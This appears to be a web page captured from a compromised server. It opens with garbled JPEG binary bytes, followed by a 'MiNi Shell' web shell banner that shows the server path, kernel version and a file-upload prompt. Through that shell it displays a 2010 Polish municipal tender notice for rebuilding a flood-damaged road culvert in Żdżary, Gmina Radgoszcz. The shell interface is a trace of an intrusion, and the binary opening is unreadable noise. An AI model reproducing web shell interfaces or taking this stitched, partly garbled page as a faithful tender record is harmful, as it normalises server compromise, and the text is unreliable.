JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101004/317184-N-2010.html

<p class="kh_header"><b>Radgoszcz: ODBUDOWA PRZEPUSTU W CIĄGU DROGI GMINNEJ NA KRAKUSY 
W MIEJSCOWOŚCI ŻDŻARY (GMINA RADGOSZCZ) 
W RAMACH USUWANIA SKUTKÓW POWODZI
sprawa znak: BI-3410/ 187 /10</b><br>
<b>Numer ogłoszenia: 317184 - 2010; data zamieszczenia: 04.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Radgoszcz , pl. św Kazimierza 7-8, 33-207 Radgoszcz, woj. małopolskie, tel. 0-14 641-41-39, faks 0-14 641-46-61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBUDOWA PRZEPUSTU W CIĄGU DROGI GMINNEJ NA KRAKUSY 
W MIEJSCOWOŚCI ŻDŻARY (GMINA RADGOSZCZ) 
W RAMACH USUWANIA SKUTKÓW POWODZI
sprawa znak: BI-3410/ 187 /10.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Charakterystyka stanu istniejącego

	Projektowana inwestycja (odbudowa przepustu w ciągu drogi gminnej Na Krakusy w miejscowości Żdżary) zlokalizowana jest w miejscowości Żdżary - Gmina Radgoszcz, na działce gminnej w msc. Żdżary i graniczy z działkami o numerach ewidencyjnych nr 93/3, 100 i 101. Właścicielem działki o numerze ewidencyjnym 101 jest również Gmina Radgoszcz. Istniejący przepust położony jest w  odległości około 50 m od drogi powiatowej 1322K Dąbrowa Tarnowska - Radgoszcz. Trasa drogi gminnej - Na Krakusy w miejscu przekraczania cieku wodnego (bez nazwy) przebiega w nasypie. Wysokość nasypu drogi po obu stronach przepustu wynosi około 2,2 m. Fakt ten w połączeniu z małym światłem (średnicą) istniejącego przepustu powoduje okresowe spiętrzanie się wód  powyżej przepustu pod korpusem drogi - Na Krakusy powodując cykliczne zalewanie terenów położonych po lewej stronie rogi - Na Krakusy. Należy również dodać, że przepust pod korpusem drogi powiatowej (położony powyżej drogi Na Krakusy wykonany jest jako: przepust ramowy o wysokości 1,0 m i szer. 1,2 m oraz dodatkowo w 2010 r. dobudowano przewód rurowy o średnicy 120 cm). Wyliczone światło przepustu pod droga powiatową o średnicy zastępczej wynoszącej około 2,4 m2 zdecydowanie przewyższa istniejące światło przepustu pod drogą gminną Na Krakusy wynoszące około 1,28 m2 . W 2010 r. podczas spływu wód powodziowych nastąpiło zniszczenie istniejących konstrukcji nawierzchni bitumicznej nad przepustem jak również konstrukcji przepustu - przemieszczenie elementów rurowych oraz zniszczenie konstrukcji ścianek czołowych. Dodatkowo przepływająca woda dokonała znacznego zamulenia przekroju rowu melioracyjnego (bez nazwy) oraz była bezpośrednią przyczyną powstania znacznych wyrw w przekroju rowu występujących zarówno poniżej jak i powyżej przepustu pod korpusem drogi. W chwili obecnej stan przepustu w ciągu drogi gminnej Na Krakusy zagraża bezpieczeństwu ruchu drogowego oraz negatywnie wpływa na bezpieczeństwu powodziowe terenów położonych powyżej drogi gminnej Na Krakusy.   

	Według załączonej mapy sytuacyjnej w skali 1 : 1 000 na odcinku odbudowy przedmiotowego przepustu brak jest jakichkolwiek urządzeń obcych mogących mieć bezpośredni wpływ na utrudnienia w planowanych robotach budowlano - montażowych.

Opis zakresu projektowanego

	W związku ze zbyt małą przepustowością istniejących przewodów rurowych;
 w celu zwiększenia możliwości przeprowadzenia wód z deszczy nawalnych zaleca się wykonanie całego przewodu rurowego z rur o średnicy 2 x 150 cm, dodatkowo warunkując to ograniczeniem ilości styków rurociągu oraz stosowanie rur 
o połączeniach kielichowych.                      

	Zalecenia powyższe wynikają z przeprowadzonych obliczeń  hydraulicznych dla zlewni położonej powyżej drogi gminnej Na Krakusy. Przy przeprowadzeniu obliczeń hydraulicznych wyznaczono wielkość zlewni dla istniejącego rowu wraz z jej charakterem oraz współczynnikiem spływu. Obliczenia  te zamieszczono w części archiwalnej projektu. 

  Projektowany jest nowy przepust rurowy z wymaganiami określonymi w Katalogu
Budownictwa KB- 7.7.(4) - Przepusty rurowe bez piętrzenia - monolityczne. Zawarte
w powyższym Katalogu projekty typowe przepustów zostały zatwierdzone do stosowania decyzją Ministra Rolnictwa nr GWM - Tn-710/26/72 z dnia 10.VII.1972 r. 
                                      
	Ze względu na różnice wysokości terenu przyległego do drogi gminnej oraz nawierzchni drogi gminnej, minimalnie ukośny przebieg istniejącego przepustu w stosunku do przebiegu drogi gminnej  (około 81) oraz istniejącą szerokość nawierzchni bitumicznej - 3 m  projektowany jest przewód rurowy o długości 7,5 m oraz średnicy 2 x 150 cm. Modyfikacji ulega jedynie rodzaj rur na przewód rurowy. Zaprojektowano przewód rurowy z rur kielichowych typu WIPRO, których szczegółową charakterystykę podano poniżej. Trasę odbudowywanego przepustu należy poprowadzić ściśle po istniejącej trasie przebudowywanego przepustu. 
 
    Zakres robót obejmuje kompletne wykonanie robót tj. prace przygotowawcze
i rozbiórkowe, wykonanie nowego przewodu rurowego z rur typu WIPRO (na fundamencie betonowym), wykonanie przyczółków przepustu, wykonanie ubezpieczenia dna i skarp na części wlotowej i wylotowej przepustu, odtworzenie nawierzchni drogi gminnej Na Krakusy. Ze względu na stosunkowo późny okres prowadzenia robót oraz obawy co do możliwości wykonania nawierzchni z mieszanek bitumicznych planowana jest odbudowa nawierzchni drogi gminnej nad odbudowanym przepustem jako nawierzchnia z mieszanki mineralnej - tłuczniowej; warstwa górna 

  Szczegółowo przedmiot robót obejmuje wykonanie następujących robót:   
- prace przygotowawcze dla wykonania przepustu tj. Wykonanie Planu Organizacji  Ruchu, oznakowanie oraz utrzymanie ruchu podczas prac związanych z przebudową przepustu. Bezpośrednio przed rozpoczęciem prac związanych z odbudową przepustu należy wykonać odmulenie rowu poniżej i powyżej przepustu. Ze względu na widoczne zaleganie w dnie rowu poniżej przepustu mieszanki tłuczniowej (przemieszczenie z korpusu drogi podczas przepływu wód powodziowych) należy urobek z odmulania wywieść z pasa konserwacyjnego rowu. 
- rozbiórka  istniejącej  nawierzchni oraz podbudowy 
- rozbiórka istniejącej części przewodu rurowego wraz z późniejszym przewozem rur
z rozbiórki na miejsce deponowania 
- wykonanie nowego przepustu; w celu zminimalizowania  czasu odbudowy przepustu 
(bardzo uciążliwe dla korzystających czasowe zamkniecie drogi Na Krakusy) oraz zwłaszcza kłopotliwe wykonanie połączeń (zabezpieczeń) poszczególnych rur Zamawiający będzie wymagał stosowania na wykonanie rurociągu rur typu Kielichowe żelbetowe rury - WIPRO klasa wytrzymałości II wg normy PN-EN 1916:2005 - beton C44/55, bez uszczelek, uszczelnianie kielichów zaprawą cementową bez papy. Równocześnie w celu możliwości znacznego skrócenia czasu wykonywania robót Zamawiający dopuści stosowanie przyczółków (doków) prefabrykowanych warunkując to jedynie koniecznością dodatkowego wykonania (na końcu) przyczółków dokowych tzw. gurtu przeciwfiltracyjnego tj. specjalnego krawężnika betonowego o głębokości 50 cm i szerokości min. 15 cm. Przedmiotowy gurt należy wykonać w dnie oraz na szerokości ubezpieczenia skarp. Zamawiający dopuszcza również alternatywne wykonanie ubezpieczenia dna i skarp przy przepuście z płyt typu JOMB warunkując to stosowaniem płyt o grubości min. 12,5 cm oraz przytwierdzeniem płyt do podłoża poprzez przyszpilowanie każdej płyty min. 4 szt palików o fi 6 cm. 
- wykonanie podbudowy oraz odtworzenie nawierzchni drogi Na Krakusy - warstwa górna z mieszanki mineralnej o uziarnieniu 0-63 mm
- wykonanie poręczy drogowych typu SP-06, rozstaw słupków co 4 m, dwukrotne zakończenia barier po 4 oraz odcinek poziomy 4 m.
- odtworzenie rowów przydrożnych - wprowadzenie na wykonane ubezpieczenia skarp przepustu.
 

Szczegółowy zakres robót zawarto w Przedmiarze Robót 

UWAGI DODATKOWE:

Nowy przepust należy posadowić na obecnej rzędnej posadowienia. Przed rozpoczęciem prac przyszły Wykonawca Robót wspólnie z Inspektorem Nadzoru sprawdzą rzędną posadowienia. Spadek przewodu rurowego nie powinien przekraczać 0,4 %.

Dla uniknięcia późniejszego osiadania nawierzchni zasypkę przewodu rurowego pod korpusem drogowym należy wykonać z należytą starannością, ponieważ koszt usunięcia ewentualnej deformacji nawierzchni (osiadania) drogi gminnej Na Krakusy ponosić będzie Wykonawca Robót.  

       Do wykonania poszczególnych warstw podbudowy (pomocniczej i zasadniczej) Zamawiający będzie wymagał stosowania mieszanek z kruszyw o średniej twardości tj. kruszywa dolomitowe; wyklucza się stosowanie kruszywa wapiennego  Dostarczone kruszywo musi spełniać wymagania stawiane kruszywom łamanym stosowanym do budowy i remontów dróg (w szczególności norma: PN- S-06102 - Podbudowy z kruszyw stabilizowanych mechanicznie). 

URZĄDZENIA OBCE.
Ewentualne kolizje z urządzeniami obcymi w postaci :
     - wodociągu,
     -  gazociągu
     -  kanalizacji sanitarnej
ze względu na brak ich występowania nie są przedmiotem tego opracowania.


Szczegółowy opis przedmiotu zamówienia zawiera:
- Specyfikacja Istotnych Warunków Zamówienia wraz z załącznikami.

Miejsce realizacji robót: 
- Żdżary, Gmina Radgoszcz, powiat dąbrowski, województwo małopolskie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.22.20.00-9, 45.24.64.00-7, 45.23.32.26-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium w wysokości 2.000,00 zł (słownie: dwa tysiące 00/100 złotych). 
2. Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr z 2007 Nr 42, poz. 275).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść na konto Zamawiającego:
Bank Spółdzielczy Dąbrowa Tarnowska, Nr 92-9462-0003-2002-2000-0062-0005
W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.

5. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego tj. Urząd Gminy w Radgoszczy, adres: 33-207 Radgoszcz, Pl. Św. Kazimierza 7-8, pok. Nr 11 (sekretariat) lub zamieścić w osobnej kopercie - opisanej wadium dołączonej do oferty.
6. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny na zasadzie spełnia/nie spełnia, na podstawie złożonego w ofercie dokumentu tj. wymienionego w pkt III 4.2, tj. aktualnego odpisu z właściwego rejestru, potwierdzającego uprawnienia Wykonawcy do wykonywania robót budowlanych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny na zasadzie spełnia/nie spełnia, na podstawie złożonego w ofercie dokumentu tj. wymienionego w pkt III 4.1, tj. wykazu robót budowlanych, z którego ma wynikać, że Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, minimum dwie roboty budowlane odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, tzn. roboty budowlane polegające na odbudowie przepustów o wartości brutto powyżej 50.000 zł każda z nich z załączeniem dokumentów potwierdzających, że ww. roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny na zasadzie spełnia/nie spełnia, na podstawie złożonego w ofercie dokumentu tj. wymienionego w pkt III 4.1 oświadczenia o osobach uczestniczących w wykonaniu zamówienia potwierdzającego, że wykonawca ma w dyspozycji personel: - kierownika budowy z uprawnieniami do kierowania robotami w specjalności wodno - melioracyjnej oraz, że przynależy do Polskiej Izby Inżynierów Budownictwa, - pracowników fizycznych w ilości niezbędnej do wykonania przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny na zasadzie spełnia/nie spełnia, na podstawie złożonego w ofercie dokumentu tj. wymienionej w pkt III 4.1, tj. polisy ubezpieczeniowej potwierdzającej, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na kwotę co najmniej 100.000,00 zł. Jeżeli ubezpieczenie jest w innej walucie niż PLN, to zostanie przeliczone po kursie NBP, ogłoszonym w dniu poprzedzającym dzień otwarcia ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w przypadku dokonania zmian w projekcie budowlanym.
2. Cena może być zmieniona gdy:
a) nastąpi urzędowa zmiana stawki podatku VAT,
b) wystąpi istotna różnica między obmiarem projektowym, a obmiarem powykonawczym,
c) zamawiający ograniczy zakres zamówienia, wprowadzi zamienne rozwiązania lub materiały
3. Termin realizacji zamówienia może być zmieniony:
a) jeżeli w trakcie budowy zaszła konieczność wykonania nieprzewidzianych robót lub zamawiający dokonał istotniej zmiany projektu,
b) w razie zakłócenia toku robót budowlanych przez protesty społeczne i ingerencje osób trzecich oraz wstrzymanie budowy przez organ nadzoru budowlanego i inne ograny nadzoru, ale tylko po stwierdzeniu zaniedbań niezawinionych przez Wykonawcę,
c) w razie braku możliwości wykonania zamówienia zgodnie z dostarczoną dokumentacją i przekazanym placem budowy,
d) jeżeli w otoczeniu budowy rozpoczęto realizację robót, które uniemożliwiają dostęp do placu budowy lub z przyczyn praktycznych, roboty w otoczeniu placu budowy powinny być wykonane wcześniej,
e) w przypadku opóźnień wynikających z:
- działania siły wyższej, np. klęski żywiołowej, 
- wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności. Fakty te muszą mieć odzwierciedlenie w dzienniku  budowy i muszą być potwierdzone przez inspektora nadzoru.

W przedstawionych przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji z tym, że maksymalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.radgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Radgoszcz. Pl. Św. Kazimierza 7-8, 33-207 Radgoszcz,  Pokój Nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 09:00, miejsce: Urząd Gminy Radgoszcz. Pl. Św. Kazimierza 7-8, 33-207 Radgoszcz,  Pokój Nr 11 (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
